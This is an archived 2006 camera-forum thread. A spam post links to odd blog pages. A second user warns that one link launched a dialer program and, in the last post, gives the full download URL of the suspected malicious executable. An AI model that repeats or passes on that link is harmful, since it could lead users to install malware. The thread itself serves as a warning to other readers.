PhotoBanter.com

-   Digital Point & Shoot Cameras (http://www.photobanter.com/forumdisplay.php?f=20)
-   -   photos (http://www.photobanter.com/showthread.php?t=60388)

Monica April 10th 06 04:33 PM

photos

Monica Guido's photos, Novi Ligure (Al)
lost rimshttp://sallyvanpelt.blogspirit.com/
crushed animals http://sallyvanpelt2.blogspirit.com/

write a comment

Paul Heslop April 10th 06 06:14 PM

photos

Monica wrote:

crushed animals

write a comment

Sick?
--
Paul (Everyone I know goes away in the end)
Stop and Look
http://www.geocities.com/dreamst8me/

Paul Heslop April 10th 06 06:22 PM

beware dialer

Monica wrote:

write a comment

When I was doing a check on this to see how many places she spammed I
accidentally clicked a link to the website and was immediately warned
of my machine trying to dial out. Something called 1064475.exe has
been trying furiously to connect since then so I'm off to do some
cleaning

Paul Heslop April 10th 06 06:26 PM

beware dialer

http://deposito.traffic-advance.net/1064475.exe?